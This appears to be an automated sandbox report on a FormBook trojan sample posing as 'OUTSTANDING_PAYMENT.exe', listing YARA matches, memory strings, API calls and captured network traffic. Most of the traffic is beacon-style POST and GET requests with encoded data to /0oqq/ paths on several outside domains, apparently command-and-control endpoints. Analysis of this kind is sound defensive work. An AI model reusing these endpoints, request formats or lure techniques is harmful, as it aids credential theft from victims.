          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/product/for-domain-use/web-forwarding/?ipartner=6666&adv_id=click_domain_forward&
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/product/mail/forward/?ipartner=6666&adv_id=click_mail_forward&utm_source=stpg_all
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/whois/?searchWord=LANDLOTTO.RU&ipartner=6666&adv_id=whois_info&utm_source=stpg_al
          Source: rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru?ipartner=6666&adv_id=logo&utm_source=stpg_all&utm_medium=link&utm_campaign=logo
          Source: unknownHTTP traffic detected: POST /0oqq/ HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeContent-Length: 189Cache-Control: no-cacheOrigin: http://www.virginhairweave.co.ukUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.virginhairweave.co.uk/0oqq/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 49 43 48 79 76 6a 35 3d 6a 52 49 6f 70 75 49 4b 6d 35 6d 34 62 38 49 58 62 6f 44 7a 28 34 55 62 41 6f 66 54 52 54 68 4e 72 58 6f 32 6d 65 67 76 6b 74 6b 6b 47 6d 49 32 36 6f 53 63 34 4c 33 5f 47 39 37 75 4c 6e 31 75 35 4c 50 6b 56 61 62 6e 31 72 48 72 36 47 50 35 76 63 49 32 71 5f 4f 41 68 4c 38 32 4f 6d 68 37 63 36 55 36 76 52 4e 62 4f 69 5a 30 71 55 62 48 62 69 39 76 75 58 55 32 4e 61 74 75 68 4d 61 4c 73 45 49 72 47 32 79 32 4e 73 74 52 64 75 68 53 73 38 63 52 77 41 31 48 4a 66 46 45 72 78 34 4a 4e 49 69 53 6f 36 52 37 52 4d 63 70 43 72 30 31 30 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: ICHyvj5=jRIopuIKm5m4b8IXboDz(4UbAofTRThNrXo2megvktkkGmI26oSc4L3_G97uLn1u5LPkVabn1rHr6GP5vcI2q_OAhL82Omh7c6U6vRNbOiZ0qUbHbi9vuXU2NatuhMaLsEIrG2y2NstRduhSs8cRwA1HJfFErx4JNIiSo6R7RMcpCr010w).
          Source: unknownDNS traffic detected: queries for: www.themssterofssuepnse.rest
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.hudsonandbailey.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA== HTTP/1.1Host: www.dirdikyepedia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.g2fm.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA== HTTP/1.1Host: www.mynichemarket.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.landlotto.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=rLgLF68UEZ/jOQpbJtvCh1aTqtb77wkxPt9G2kjS7kCRXhXDnB6LHrmjVzEzts5aMFPYOamRADOx5QsnbVGJmi/5P43wAiKcGg== HTTP/1.1Host: www.gorwly.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA== HTTP/1.1Host: www.allison2patrick.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.glb-mobility.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g== HTTP/1.1Host: www.fanversewallet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.karlscurry.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 HTTP/1.1Host: www.hudsonandbailey.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== HTTP/1.1Host: www.virginhairweave.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: OUTSTANDING_PAYMENT.exe
          Sample has a suspicious name (potential lure to open the executable)
          Source: OUTSTANDING_PAYMENT.exeStatic file information: Suspicious name
          Source: OUTSTANDING_PAYMENT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.qhcqh.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.qhcqh.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.777131854.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\OUTSTANDING_PAYMENT.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_00C5279E1_2_00C5279E
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F31D71_2_027F31D7
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 1_2_027F33771_2_027F3377
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004058332_2_00405833
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004038AA2_2_004038AA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004038B32_2_004038B3
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004222AA2_2_004222AA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00401B902_2_00401B90
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00421BAC2_2_00421BAC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00421CCE2_2_00421CCE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004225842_2_00422584
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040560B2_2_0040560B
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004056132_2_00405613
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004207092_2_00420709
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004207132_2_00420713
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004017CF2_2_004017CF
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004217CD2_2_004217CD
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_004017D02_2_004017D0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00421FDC2_2_00421FDC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040BFEE2_2_0040BFEE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0040BFF32_2_0040BFF3
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_00C5279E2_2_00C5279E
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012B41202_2_012B4120
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0129F9002_2_0129F900
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0136E8242_2_0136E824
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013510022_2_01351002
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C20A02_2_012C20A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013620A82_2_013620A8
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AB0902_2_012AB090
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013628EC2_2_013628EC
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01362B282_2_01362B28
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012CEBB02_2_012CEBB0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135DBD22_2_0135DBD2
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013503DA2_2_013503DA
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013622AE2_2_013622AE
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01290D202_2_01290D20
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01362D072_2_01362D07
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_01361D552_2_01361D55
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012C25812_2_012C2581
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012AD5E02_2_012AD5E0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_013625DD2_2_013625DD
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012A841F2_2_012A841F
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0135D4662_2_0135D466
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: String function: 0129B150 appears 41 times
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: String function: 00C52193 appears 44 times
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: String function: 00C52D64 appears 70 times
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E613 NtCreateFile,2_2_0041E613
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E6C3 NtReadFile,2_2_0041E6C3
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E743 NtClose,2_2_0041E743
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E7F3 NtAllocateVirtualMemory,2_2_0041E7F3
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E73D NtClose,2_2_0041E73D
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_0041E7ED NtAllocateVirtualMemory,2_2_0041E7ED
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_012D9910
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D99A0 NtCreateSection,LdrInitializeThunk,2_2_012D99A0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_012D9860
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9840 NtDelayExecution,LdrInitializeThunk,2_2_012D9840
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D98F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_012D98F0
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A20 NtResumeThread,LdrInitializeThunk,2_2_012D9A20
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_012D9A00
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9A50 NtCreateFile,LdrInitializeThunk,2_2_012D9A50
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D9540 NtReadFile,LdrInitializeThunk,2_2_012D9540
          Source: C:\Users\user\AppData\Local\Temp\qhcqh.exeCode function: 2_2_012D95D0 NtClose,LdrInitializeThunk,2_2_012D95D0
